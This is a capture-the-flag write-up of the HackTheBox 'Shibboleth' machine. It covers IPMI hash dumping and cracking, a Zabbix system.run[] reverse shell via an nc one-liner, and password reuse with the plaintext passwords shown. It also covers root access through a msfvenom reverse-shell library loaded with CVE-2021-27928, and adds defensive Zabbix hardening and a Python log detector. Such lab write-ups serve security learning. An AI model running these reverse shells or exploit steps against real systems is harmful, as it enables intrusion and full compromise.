Shibboleth - HackTheBox
Shibboleth Machine(10.10.11.124)
Info:
This was a medium Linux box aimed at teaching players about Zabbix, a MariaDB command injection CVE and a password reuse vulnerability.
Recon:
Starting with a port scan, only one port shows as open; we can always run a full port scan in the background.
rustscan -a 10.10.11.124 -u 5000
PORT STATE SERVICE REASON
80/tcp open http syn-ack
UDP port scan
As rustscan supports only TCP, we will use nmap for UDP scanning.
sudo nmap -sU 10.10.11.124
PORT STATE SERVICE
623/udp open asf-rmcp
This port is used by IPMI-based remote management (out-of-band monitoring) systems. Let's run a more detailed nmap scan on it.
Let's add shibboleth.htb to our hosts file and also run vhost scanning in the background.
ffuf -u http://shibboleth.htb/ -w ~/wordlist/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.shibboleth.htb" -fc 302
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://shibboleth.htb/
:: Wordlist : FUZZ: /home/ubuntu/wordlist/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.shibboleth.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 302
________________________________________________
monitor [Status: 200, Size: 3689, Words: 192, Lines: 30, Duration: 303ms]
monitoring [Status: 200, Size: 3689, Words: 192, Lines: 30, Duration: 425ms]
zabbix [Status: 200, Size: 3689, Words: 192, Lines: 30, Duration: 418ms]
:: Progress: [4989/4989] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:43] :: Errors: 0 ::
Let's add these hosts to our /etc/hosts file as well.
Each of them has the same landing page: zabbix.shibboleth.htb, monitor.shibboleth.htb and monitoring.shibboleth.htb.
Google describes Zabbix as "Zabbix is an open-source software tool to monitor IT infrastructure such as networks, servers, virtual machines, and cloud services. Zabbix collects and displays basic metrics".
Directory and file fuzzing doesn't reveal much beyond common files such as index.html, assets and contact.
Foothold: IPMI hash dump
As HackTricks notes, we can retrieve the default user's hashed password using the Metasploit module scanner/ipmi/ipmi_dumphashes.
It dumps the Administrator user's hash; let's crack that with hashcat. You can specify the output format in Metasploit as well. Manually, you can put just the hash (without the username) in a file. I cracked it using hashcat on Google Colab.
!hashcat/hashcat "01c82d308205000004872b9f98e0052b521984be95a86bd5a70c5d5a69e7ab29e42e1849a8a359b1a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:4ae0c52b06606c6407c0a16a0bf117ffc9d9e6a1" wordlists/rockyou.txt
It reveals the password; let's log in to Zabbix using it.
Getting reverse shell from zabbix:
PS: As of today (31 March 2022), while writing this blog, I searched for a Zabbix 5.0.17 exploit and there is an authenticated CVE which works pretty well. But that is not the intended path, as the box was released in 2021 and this exploit was published on 9 March 2022.
I remember that the first time I did this machine I searched for how to execute commands with Zabbix and found this video. Basically, using the Zabbix agent we can execute commands on the system.
Go to Hosts and create a new item.
Using system.run[] in a Zabbix agent item we can execute arbitrary commands. Reading the docs a little, we find it runs in two modes, wait and nowait, where wait is the default.
Create an item in wait mode:
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 8083 >/tmp/f]
and I got a shell, but it dies instantly.
While asking for help earlier I learned that you can start a process in a new session, which won't be killed by Zabbix, using the setsid command.
setsid rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 8083 >/tmp/f
setsid would keep your shell alive. But let's try this with nowait once.
The same problem persists. So let's switch to the setsid payload, and it works.
Let's upgrade to a TTY shell.
Reading the apache2 config file, we can see the Zabbix root directory is /usr/share/zabbix.
Also note that the monitor and monitoring vhosts are just aliases for zabbix.
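For the defender's side of this step, here is an added example (not from the writeup) of the agent-side control that closes the system.run[] path. Zabbix agent 5.0 supports AllowKey/DenyKey rules in zabbix_agentd.conf and deprecates the older EnableRemoteCommands switch; the fragment below shows the weak setting next to the hardened one. The file path and the surrounding options are assumed, not taken from the box.

```ini
# zabbix_agentd.conf fragment (added example, not from the original post)

# Weak: the pre-5.0 switch that lets the server run system.run[] items
# on this agent, which is exactly what the item created above relied on.
# In agent 5.0 it is deprecated and behaves like AllowKey=system.run[*].
EnableRemoteCommands=1

# Hardened (Zabbix agent 5.0+): refuse system.run[] item keys outright.
# With this line present, an item such as system.run[...] created in the
# frontend returns "Unsupported item key" instead of executing a command.
DenyKey=system.run[*]
```

This only protects the agent that carries the line, so it belongs in the configuration baseline for every monitored host, and the server-side compensating control is keeping Administrator and any other account that can create items behind a non-reused, non-default password.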
Lateral Movement: password reuse
I started enumerating the box with linpeas and found some interesting paths like /etc/zabbix and /var/log/zabbix, which have content related to Zabbix. I started hunting for the Zabbix database password but couldn't find it, as it isn't in /usr/share/zabbix. And the conf files in /etc/zabbix, which a few Google searches suggested could contain the password, aren't readable by the zabbix user.
But we already have a password, which we cracked earlier for the Administrator user. Let's try that:
su ipmi-svc
Password: ilovepumkinpie1
Privilege Escalation: CVE-2021-27928 exploit
Now from the /etc/zabbix/zabbix_server.conf file we can also read the database password:
DBUser=zabbix
DBPassword=bloooarskybluh
Let's log in using these creds, and it tells us the MariaDB version.
Googling this version number shows it is vulnerable to CVE-2021-27928. According to the description, a user can inject a command by modifying the wsrep_provider library. Let's follow these steps. Also, if you want to write your own shared library in C and compile it, you can find details here.
Create a malicious shared library file using msfvenom:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=8084 -f elf-so -o exploit.so
Transfer this to the machine using a Python web server. I like using updog for this.
Execute the payload by specifying the -e flag; by default the host (-h) is set to localhost.
mysql -u zabbix -p -e 'SET GLOBAL wsrep_provider="/tmp/exploit.so";'
On my listener,
As MariaDB was running as root (uid=0), we get our shell in root's context.
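From the defender's side of the same steps, as an added example that is not part of the writeup: the change above is visible in MariaDB's general query log as a SET GLOBAL wsrep_provider statement pointing at a library outside the Galera directory, and it is only possible for an account holding SUPER (or ALL PRIVILEGES ON *.*), which a monitoring application account like zabbix never needs. The script below, written for this post, parses constructed general-log lines and SHOW GRANTS output in Python; the log format approximates MariaDB's "Time Id Command Argument" layout, and the trusted library directories and sample accounts are assumptions. The second half of the finding on this box, mysqld running as uid 0, is fixed by the standard user=mysql setting in my.cnf rather than by anything in the script.

```python
"""Detect wsrep_provider repointing and over-privileged DB accounts.

Added example, not code from the original post. All sample data is constructed.
"""
import re
from typing import Dict, List

# Where a legitimate Galera provider library lives (assumption; adjust per distro).
TRUSTED_PROVIDER_DIRS = ("/usr/lib/galera/", "/usr/lib64/galera/")

# SET [GLOBAL|SESSION] wsrep_provider = "<path>"  (quotes optional)
WSREP_RE = re.compile(
    r"\bSET\s+(?:GLOBAL\s+|SESSION\s+)?wsrep_provider\s*=\s*['\"]?([^'\";\s]+)",
    re.IGNORECASE,
)

# One general-log record: "<yymmdd> <hh:mm:ss>  <thread id> <command>  <argument>"
LOG_RE = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$"
)

# GRANT <privs> ON <scope> TO '<user>'@'<host>' ...
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<acct>'[^']*'@'[^']*')",
    re.IGNORECASE,
)

# Constructed general-log excerpt (tab-separated like the real log).
SAMPLE_LOG = "\n".join([
    "211015 12:00:01\t    5 Connect\tzabbix@localhost on zabbix using Socket",
    "211015 12:00:01\t    5 Query\tSELECT itemid,hostid FROM items WHERE status=0",
    "211015 12:00:09\t    7 Connect\tzabbix@localhost on  using Socket",
    "211015 12:00:09\t    7 Query\tSET GLOBAL wsrep_provider=\"/tmp/exploit.so\"",
    "211015 12:00:09\t    7 Quit\t",
    "211015 12:01:00\t    8 Query\tSET GLOBAL wsrep_provider='/usr/lib/galera/libgalera_smm.so'",
])

# Constructed SHOW GRANTS output for two hypothetical accounts.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'zabbix'@'localhost' IDENTIFIED BY PASSWORD '<hash>' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `zabbix`.* TO 'zabbix_app'@'localhost'",
    "GRANT USAGE ON *.* TO 'zabbix_app'@'localhost'",
]


def find_wsrep_provider_changes(log_text: str) -> List[Dict[str, object]]:
    """Return every wsrep_provider assignment seen in Query records.

    A hit is flagged suspicious when the library path is outside the trusted
    Galera directories (for example anything under /tmp).
    """
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        q = WSREP_RE.search(m.group("arg"))
        if not q:
            continue
        path = q.group(1)
        hits.append({
            "time": m.group("ts"),
            "thread": int(m.group("tid")),
            "path": path,
            "suspicious": not path.startswith(TRUSTED_PROVIDER_DIRS),
        })
    return hits


def accounts_able_to_set_global(show_grants_lines: List[str]) -> List[str]:
    """Return accounts whose global grants (ON *.*) include SUPER or ALL PRIVILEGES.

    SET GLOBAL needs SUPER, so these are the accounts that could repoint
    wsrep_provider at all; an application account should not appear here.
    """
    risky: List[str] = []
    for line in show_grants_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "ALL PRIVILEGES" in privs or "SUPER" in privs:
            risky.append(m.group("acct"))
    return risky


if __name__ == "__main__":
    for hit in find_wsrep_provider_changes(SAMPLE_LOG):
        tag = "SUSPICIOUS" if hit["suspicious"] else "ok"
        print(f"{hit['time']} thread={hit['thread']} {tag} wsrep_provider={hit['path']}")
    print("accounts able to SET GLOBAL:", accounts_able_to_set_global(SAMPLE_GRANTS))
```

The general log has to be enabled for the first check to see anything; where that is too noisy, the same regex works on the audit plugin's query events. The grants check is the cheaper control: run it once and revoke SUPER from the Zabbix account, and the library-loading step has no account left to issue it from.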
And that's how we get root on this machine.
Thanks for reading, feedback is welcome, and don't forget to clean up your scripts and exploits before leaving the machine.
Twitter: Avinashkroy